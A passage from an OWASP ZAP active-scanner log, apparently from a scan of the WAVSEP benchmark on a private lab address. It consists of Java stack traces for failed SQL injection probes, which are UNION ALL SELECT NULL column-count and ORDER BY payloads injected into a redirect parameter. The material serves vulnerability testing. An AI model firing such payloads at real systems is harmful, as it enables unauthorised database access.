org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9680062 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' UNION ALL SELECT NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' UNION ALL SELECT NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680063 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' UNION ALL SELECT NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' UNION ALL SELECT NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680065 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' UNION ALL SELECT NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' UNION ALL SELECT NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680067 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' UNION ALL SELECT NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' UNION ALL SELECT NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680068 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680070 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680071 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680072 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680073 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680075 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680076 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' ORDER BY 1#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' ORDER BY 1# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9680077 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' ORDER BY 1497#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' ORDER BY 1497# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at 